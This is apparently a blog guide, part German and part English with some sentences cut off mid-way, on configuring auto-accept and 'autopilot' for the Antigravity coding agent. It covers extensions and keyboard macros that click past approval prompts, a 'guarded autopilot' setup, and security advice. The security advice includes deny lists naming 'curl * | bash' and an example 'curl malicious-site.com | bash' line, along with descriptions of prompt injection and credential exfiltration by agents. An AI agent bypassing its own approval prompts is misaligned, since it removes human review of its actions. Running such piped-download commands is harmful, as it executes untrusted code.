Produktivität

Antigravity Auto-Accept & Autopilot-Modus: Der vollständige Leitfaden

Hör auf, alle 10 Sekunden auf "Run" zu klicken. Hier erfährst du, wie du die freihändige Agent-Ausführung in Antigravity einrichtest — und zwar sicher.

← Zurück zum BlogAktualisiert im März 2026

Der KI-Agent von Antigravity ist leistungsstark, aber in der Standardeinstellung musst du jede Dateiänderung, jeden Terminal-Befehl und jeden Tool-Aufruf manuell genehmigen. Bei komplexen Aufgaben mit Dutzenden aufeinanderfolgenden Schritten bedeutet das, stundenlang alle paar Sekunden auf "Accept" oder "Run" zu klicken. Entwickler haben Erweiterungen entwickelt, versteckte Einstellungen entdeckt und kreative Workarounds entworfen, um diesen Genehmigungsprozess zu automatisieren — und Antigravity so in einen echten Autopilot-Coding-Assistenten zu verwandeln. Dieser Leitfaden deckt alle funktionierenden Methoden mit Stand März 2026 ab, zusammen mit den Sicherheitsaspekten, die du verstehen musst, bevor du eine davon aktivierst.

Get the latest on AI, LLMs & developer tools

New MCP servers, model updates, and guides like this one — delivered weekly.

Bevor du fortfährst: Das automatische Akzeptieren von Agent-Aktionen nimmt dir die Möglichkeit, Änderungen zu prüfen, bevor sie geschehen. Lies zuerst den Antigravity Security Guide , um zu verstehen, was der Agent mit uneingeschränkten Berechtigungen tun kann. Der in Abschnitt 7 beschriebene „Guarded Autopilot“-Ansatz ist die empfohlene Balance zwischen Geschwindigkeit und Sicherheit.

Das Genehmigungsproblem: Warum Entwickler Auto-Accept wollen

Jedes Mal, wenn der Agent von Antigravity eine Aktion ausführen möchte — eine Datei schreiben, einen Terminal-Befehl ausführen, ein MCP-Tool aufrufen oder eine URL aufrufen — hält er inne und bittet um deine Zustimmung. Dies ist eine bewusste Sicherheitsmaßnahme: Sie behält den Menschen im Prozess und verhindert, dass der Agent potenziell destruktive Operationen ohne Aufsicht ausführt.

Das Problem ist, dass bei routinemäßigen Workflows mit geringem Risiko die ständigen Unterbrechungen die Produktivität zerstören. Betrachte ein typisches Szenario: Du bittest den Agenten, das Grundgerüst für ein neues Feature mit einer Datenbank-Migration, einer API-Route, einer Frontend-Komponente und Unit-Tests zu erstellen. Der Agent muss:

  • 6–8 neue Dateien erstellen (jede erfordert eine Genehmigung)
  • Run npm install für eine neue Abhängigkeit (Genehmigung)
  • Den Befehl für die Datenbank-Migration ausführen (Genehmigung)
  • Die Test-Suite zur Überprüfung ausführen (Genehmigung)
  • Fehlgeschlagene Tests beheben und erneut ausführen (Genehmigung für jede Bearbeitung + jeden Befehl)

Das sind 15–20 manuelle Genehmigungen für ein einziges Feature. Rechnet man das auf einen ganzen Arbeitstag hoch, berichten Entwickler davon, pro Sitzung mehr als 200 Mal auf "Accept" oder "Run" zu klicken. Einige Community-Mitglieder haben berichtet, dass sie Antigravity stundenlang laufen lassen, ohne ein einziges Mal eingreifen zu müssen — aber erst, nachdem sie ihr Setup richtig konfiguriert haben. Der Rest dieses Leitfadens erklärt, wie sie das gemacht haben.

Die integrierte "Always Run"-Einstellung (und warum sie manchmal fehlschlägt)

Antigravity enthält einen integrierten Mechanismus zur automatischen Genehmigung bestimmter Operationen. Er nennt sich Terminal Execution Policy, und er befindet sich unter Settings → Antigravity → Terminal Execution Policy. Es gibt drei Modi:

  • "Off" (Nur Allow-Liste): Der Agent kann keinen Befehl ohne ausdrückliche Genehmigung ausführen. Am sichersten, aber am langsamsten.
  • "Auto" (Standard): Der Agent verwendet einen internen Sicherheits-Klassifikator, um zu entscheiden, welche Befehle „sicher“ sind und ohne Nachfrage ausgeführt werden können. Befehle wie ls, cat, und npm test werden automatisch ausgeführt; Befehle wie rm -rf oder chmod erfordern weiterhin eine Genehmigung.
  • "Turbo" (nur Deny-Liste): Der Agent führt alles aus, außer explizit blockierten Befehlen. Am schnellsten, aber auch am gefährlichsten.

Warum sich der "Auto"-Modus nicht wie ein Autopilot anfühlt: Selbst im Auto-Modus pausiert der Agent weiterhin bei Dateibearbeitungen, MCP-Tool-Aufrufen und Browser-Aktionen. Terminal-Befehle sind nur eine Kategorie der Genehmigung. Entwickler, die dies auf "Auto" stellen und einen vollständig freihändigen Betrieb erwarten, werden enttäus file writes and tool calls are governed by separate settings.

Additionally, the internal safety classifier is conservative. It frequently flags commands like npx prisma migrate dev, docker compose up, and even git commit as requiring manual approval — because they modify state. In practice, "Auto" mode still generates 5–10 approval prompts per complex task.

The three settings that control approval:
  • Terminal Execution Policy — governs shell commands only
  • Artifact Review Policy — governs file edits (accept/reject diffs)
  • MCP Tool Approval — governs external tool invocations

True autopilot requires configuring all three, not just the terminal policy.

Ralph Loop: The Community's Go-To Auto-Accept Extension

Ralph Loop is a community-built Antigravity extension that automates the approval flow by programmatically clicking the "Accept" and "Run" buttons whenever the agent pauses for confirmation. It was created after developers realized that configuring the built-in settings wasn't enough to achieve true hands-free operation.

What Ralph Loop Does

  • Auto-accepts file edits — when the agent presents a diff, Ralph Loop clicks "Accept" automatically.
  • Auto-runs terminal commands — when the agent requests permission to execute a command, it clicks "Run."
  • Auto-proceeds tool calls — MCP tool invocations and browser actions are approved without manual intervention.
  • Configurable delay — you can set a delay (in milliseconds) between the approval prompt appearing and the auto-click, giving you a window to manually cancel if needed.

Community members report using Ralph Loop to generate entire 350-page documentation sites hands-free, leaving Antigravity running for multiple hours while the agent writes, tests, and iterates on code autonomously.

Installation

# Install via the Antigravity Extension Marketplace
# Search for "Ralph Loop" in the Extensions panel
# Oder über die Befehlspalette installieren:
Strg+Umschalt+P → "Extensions: Install Extension" → nach "Ralph Loop" suchen

Konfiguration

Öffnen Sie nach der Installation Einstellungen → Erweiterungen → Ralph Loop und konfigurieren Sie:

{
  "ralphLoop.enabled": true,
  "ralphLoop.autoAcceptEdits": true,
  "ralphLoop.autoRunCommands": true,
  "ralphLoop.autoApproveTools": true,
  "ralphLoop.delayMs": 1500,
  "ralphLoop.excludeCommands": [
    "rm -rf",
    "DROP",
    "git push --force",
    "chmod -R 777"
  ]
}
Tip: The delayMs setting is your safety net. Set it to at least 1500ms (1.5 seconds) so you have time to see what the agent is about to do and manually cancel if something looks wrong. Setting it to 0 gives maximum speed but zero review time.

SuperSmooth: Fixing Auto-Proceed and Auto-Scroll

SuperSmooth is a companion extension that solves a different but related problem: even when you enable auto-accept via built-in settings or Ralph Loop, the Antigravity UI often fails to scroll to the latest output and doesn't automatically proceed to the next step in multi-step tasks.

What SuperSmooth Fixes

  • Auto-proceed: When the agent finishes one step and the UI shows a "Proceed" or "Continue" button, SuperSmooth clicks it automatically. Without this, the agent pauses between steps even with auto-accept enabled.
  • Auto-scroll: Keeps the chat output scrolled to the bottom so you can monitor progress. Antigravity's native scroll behavior often gets stuck mid-conversation during long operations.
  • "Always Proceed" issue fix: Several versions of Antigravity had a bug where the "Always Proceed" toggle in the settings panel didn't actually persist across sessions. SuperSmooth patches this by intercepting the UI state and forcing the proceed behavior regardless of the stored setting.
# Install SuperSmooth
Ctrl+Shift+P → "Extensions: Install Extension" → search "SuperSmooth"

# Configuration (settings.json)
{
  "superSmooth.autoProceed": true,
  "superSmooth.autoScroll": true,
  "superSmooth.fixAlwaysProceed": true
}

SuperSmooth funktioniert gut zusammen mit Ralph Loop. Ralph Loop übernimmt die "accept/run"-Freigaben, während SuperSmooth die "proceed/continue"-Übergänge und das UI-Scrollverhalten steuert. Zusammen bieten sie das, was einem echten Autopilot-Erlebnis derzeit am nächsten kommt.

Weitere Auto-Accept-Erweiterungen aus der Community

Neben Ralph Loop und

AG Auto-Approve

A lightweight alternative to Ralph Loop that focuses exclusively on terminal command approval. It doesn't handle file edits or MCP tools — only shell commands. Useful if you want to auto-run commands but still manually review file changes. Configurable allowlist lets you specify exactly which commands can auto-execute.

Turbo Accept

A more aggressive extension that auto-accepts everything with zero delay. No configuration options, no exclude lists, no safety nets. It's essentially "click yes to everything as fast as possible." Community consensus: useful for throwaway experiments and prototyping, dangerous for anything you care about.

Keyboard Macro Approach

Some developers skip extensions entirely and use OS-level keyboard macro tools (like AutoHotkey on Windows or Hammerspoon on macOS) to detect the approval dialog and send the keyboard shortcut for "Accept." This approach is brittle — it breaks when the UI layout changes — but it works across all Antigravity versions since it doesn't depend on the extension API.

Note: Community extensions are not officially vetted by Google. Always review the source code of any extension before installing it, and check when it was last updated. Extensions that haven't been maintained for 60+ days may break on new Antigravity releases. If you experience issues after installing an extension, see our Antigravity not responding fix.

Security Implications: What You're Actually Risking

Every auto-accept extension fundamentally does the same thing: it removes the human review step from the agent's execution loop. Before enabling any form of autopilot, you need to understand what the agent is capable of doing when given unrestricted access:

What unrestricted agent access enables

  • File system access: The agent can read, write, and delete any file your user account has permissions for — including .env files, SSH keys, and credentials.
  • Terminal execution: The agent can run arbitrary shell commands. With auto-accept, rm -rf / and curl malicious-site.com | bash get the same treatment as npm test.
  • Network access: The agent can browse URLs, send HTTP requests, and exfiltrate data to external servers via the built-in browser or terminal commands.
  • Global config modification: The agent can modify MCP configs, system files, and even install persistent backdoors that survive reinstallation.
  • Prompt injection vulnerability: Malicious code hidden in project files or web pages can hijack the agent's actions. With auto-accept, the injected instructions execute immediately without review.

The risk isn't theoretical. Security researchers have documented cases where agents, given unrestricted permissions, read .env files and sent credentials to external URLs — all without the user noticing until after the fact. One widely-reported incident involved an agent deleting the entire contents of a user's drive after misinterpreting a vague instruction.

The takeaway: Auto-accept ist ein Produktivitätsmultiplikator, aber auch ein Risikomultiplikator. Der nächste Abschnitt beschreibt den empfohlenen Ansatz, um sowohl Geschwindigkeit als auch Sicherheit zu gewährleisten.

Empfohlen: Das "Guarded Autopilot"-Setup

Der sicherste Weg, Antigravity im Autopilot-Modus auszuführen, ist das automatische Akzeptieren sicherer Operationen, während für destruktive eine manuelle Genehmigung erforderlich ist. Dieser "guarded autopilot"-Ansatz bietet Ihnen 80 % des Geschwindigkeitsvorteils bei 95 % der Sicherheit. Hier ist die genaue Kon

Step 1: Configure the Terminal Policy

Set the Terminal Execution Policy to "Auto" and add a custom deny list for dangerous commands:

# Settings → Antigravity → Terminal Execution Policy
Terminal Execution Policy: "Auto"

# Add to your deny list:
rm -rf
rm -r /
chmod -R 777
git push --force
git reset --hard
DROP TABLE
DROP DATABASE
curl * | bash
wget * | sh
sudo *
shutdown
reboot

Step 2: Configure Artifact Review

Set the Artifact Review Policy to "Auto-Accept" for file edits within your project directory. This eliminates the most frequent source of approval prompts — the "Accept diff?" dialog that appears for every file the agent wants to modify.

Step 3: Configure MCP Tool Approval

Set MCP Tool Approval to "Auto for known tools". This auto-approves tools from MCP servers you've already installed and configured, while still prompting for unknown or newly-added tools.

Step 4: Install Ralph Loop with Conservative Settings

{
  "ralphLoop.enabled": true,
  "ralphLoop.autoAcceptEdits": true,
  "ralphLoop.autoRunCommands": false,
  "ralphLoop.autoApproveTools": true,
  "ralphLoop.delayMs": 2000
}

Hinweis autoRunCommands ist eingestellt auf false. Das bedeutet, dass Ralph Loop Dateiänderungen und Tool-Aufrufe automatisch akzeptiert (da diese ein geringeres Risiko darstellen, weil sie innerhalb der Sandbox des Agents operieren), aber weiterhin eine manuelle Genehmigung für Terminal-Befehle erfordert (die direkten Systemzugriff haben). Die integrierte "Auto"-Terminal-Policy verarbeitet sichere Befehle automatisch; Sie müssen nur bei den markierten Befehlen klicken.

Ergebnis: Mit diesem Setup reduziert sich die Anzahl der Genehmigungsklicks für den durchschnittlichen Entwickler von ca. 200 pro Tag auf ca. 15–20 — und die verbleibenden Klicks beziehen sich ausschließlich auf Vorgänge, die tatsächlich eine menschliche Überprüfung erfordern (destruktive Terminal-Befehle, unbekannte MCP-Tools, force-pushes). Weitere Informationen zum Schreiben von Regeln, um das Verhalten des Agents weiter einzuschränken, finden Sie im Leitfaden für benutzerdefinierte Regeln.

Verwendung von .antigravityignore und Sandboxing für sichere Automatisierung

Bevor Sie einen Mechanismus zur automatischen Annahme aktivieren, sollten Sie einschränken, worauf der Agent zugreifen kann. Dies begrenzt den Schadensradius, falls etwas schiefgeht.

Die .antigravityignore-Datei

Diese Datei teilt dem Agent mit, welche Dateien und Verzeichnisse von der Indizierung und Bearbeitung ausgeschlossen werden sollen. Verwenden Sie sie bei Autopilot-Workflows zum Schutz sensibler Dateien:

# .antigravityignore — sensible Dateien vor Agent-Zugriff schützen

# Anmeldedaten und Secrets
.env
.env.*
*.pem
*.key
credentials.json
service-account.json

# Infrastruktur-Konfigurationen
terraform/
.aws/
.gcloud/
docker-compose.prod.yml

# Build-Artefakte (beschleunigt auch die Indizierung)
node_modules/
dist/
.next/
build/
coverage/

Für weitere Details zur Optimierung Ihrer .antigravityignore im Hinblick auf die Performance, lesen Sie unseren Leitfaden zur Ladegeschwindigkeit des Agents.

Sandboxing mit Docker

Für maximale Sicherheit während Autopilot-Sessions sollten Sie Ihr Projekt in einem Docker-Container ausführen. Der Agent kann weiterhin Befehle ausführen und Dateien bearbeiten, aber sein Zugriff ist auf das Dateisystem des Containers beschränkt. Wenn der Agent etwas Destruktives tut, verlieren Sie nur einen Container — nicht Ihr Host-System.

# Erstellen Sie einen isolierten Entwicklungs-Container
docker run -it --rm \
  -v $(pwd):/workspace \
  -w /workspace \
  --network=host \
  node:20-slim bash

# Open the container as your workspace in Antigravity
# The agent now operates inside the container sandbox

Git as a Safety Net

Always commit your work before starting an autopilot session. If the agent makes unwanted changes across dozens of files, a single git checkout . reverts everything. Treat autopilot sessions like experiments: branch, let the agent work, review the diff, then merge or discard.

Agent Command Execution Rules Configuration

Beyond the UI settings, you can configure granular command execution rules using the gemini.md rules file or the workspace-level .antigravity/settings.json. These rules give you fine-grained control over what the agent can and cannot do automatically.

Example: Per-Project Execution Rules

# .antigravity/settings.json
{
  "agent.terminalPolicy": "auto",
  "agent.terminalDenyList": [
    "rm -rf",
    "DROP",
    "git push --force"
  ],
  "agent.terminalAllowList": [
    "npm test",
    "npm run build",
    "npx prisma migrate dev",
    "npx prisma generate",
    "git add",
    "git commit"
  ],
  "agent.autoAcceptEdits": true,
  "agent.autoAcceptEditsExclude": [
    ".env*",
    "package.json",
    "*.lock"
  ],
  "agent.mcpAutoApprove": true,
  "agent.nonWorkspaceAccess": false
}

Diese Konfiguration akzeptiert die meisten Operationen automatisch, schließt jedoch sensible Dateien (.env, package.json, Lockfiles) von der automatischen Bestätigung aus, blockiert destruktive Terminal-Befehle und verhindert, dass der Agent auf Dateien außerhalb des Workspace zugreift.

Beispiel: gemini.md Regeln für Autopilot-Sicherheit

Sie können das Verhalten des Agents auch durch Regeln in natürlicher Sprache in Ihrer gemini.md Datei einschränken. Diese dienen als Anweisungen, die der Agent während der Ausführung befolgt:

# gemini.md — Autopilot

## Command Restrictions
- NEVER run commands that delete files outside the project directory
- NEVER force-push to any branch
- NEVER modify .env files without showing me the diff first
- NEVER install packages from untrusted sources

## Workflow Rules
- Always run tests after modifying code
- Commit work in small, logical chunks
- If a test fails 3 times, stop and ask for guidance
- Do not modify infrastructure files (Dockerfile, docker-compose.yml)

For complete examples of rules files and best practices, see our workflows guide and user rules reference.

Future: Will Google Add a Native Autopilot Mode?

As of March 2026, Google has not announced an official autopilot or "unattended agent" mode for Antigravity. However, several signals suggest it's on the roadmap:

  • Auto-continue is now always on: In v1.20.3, Google removed the toggle for auto-continue and made it the default behavior. This eliminated one category of manual intervention (the "Continue?" prompt between task steps).
  • The "Turbo" execution mode exists: The fact that Google shipped a "deny list only" terminal mode suggests they're comfortable with reduced human oversight for certain use cases.
  • Competitor pressure: Other AI coding tools have already shipped autopilot features with configurable safety boundaries. Google typically responds to competitive features within 1–2 release cycles.
  • Gemini API "function calling" auto-mode: The underlying Gemini API already supports automatic function calling without human confirmation. The infrastructure for auto-execute exists at the API level; it just hasn't been fully exposed in the Antigravity UI.

The most likely implementation would be a first-party "Autopilot Mode" with configurable guardrails — similar to what the guarded autopilot setup in this guide achieves manually, but built into the settings UI. Expect it to include an allowlist/denylist for commands, file protection patterns, and a session-scoped sandbox option.

Until then, the extension-based approach described above is the community standard. The Ralph Loop + SuperSmooth + guarded settings combination is used by thousands of developers daily and represents the most battle-tested autopilot setup available.


Before You Enable Autopilot

Auto-accept gives the agent unrestricted power. Make sure your setup is hardened first. Read our Security Hardening Guide um die Risiken zu verstehen, und lesen Sie dann den Leitfaden zur Agent-Performance um sicherzustellen, dass Ihr Agent schnell genug für den unbeaufsichtigten Betrieb lädt.

Mehr automatisieren mit Regeln & Workflows

Auto-accept ist nur der erste Schritt. Kombinieren Sie es mit benutzerdefinierten Regeln und vorgefertigten Workflows für ein vollständig autonomes Entwicklungs-Setup.

Related Guides

Guides & Features

Humanizer Skill Guide

blader/humanizer: 29 AI-writing patterns, voice calibration, and a two-pass audit, all in one Claude Code skill.

Guides & Features

Mastering Agent Skills

The open standard for portable AI agent expertise.

Guides & Features

Antigravity Workflows Guide

Create automation recipes with Turbo Mode and AgentKit 2.0.

Guides & Features

How to Change Antigravity Themes

Customize themes, dark mode, icons, and color schemes.

Guides & Features

How to Change Language

Switch Antigravity to Spanish, German, Japanese, and more.

Guides & Features

Antigravity Security Guide

Known vulnerabilities, safe settings, and hardening steps.

Autopilot-Einstellungen Cheat Sheet

Holen Sie sich unser einseitiges PDF mit der exakten Konfiguration für den abgesicherten Autopilot — Terminal-Deny-List, Extension-Einstellungen, .antigravityignore-Vorlage und gemini.md Sicherheitsregeln.

    We respect your privacy. Unsubscribe at any time.

    Sponsored AI assistant. Recommendations may be paid.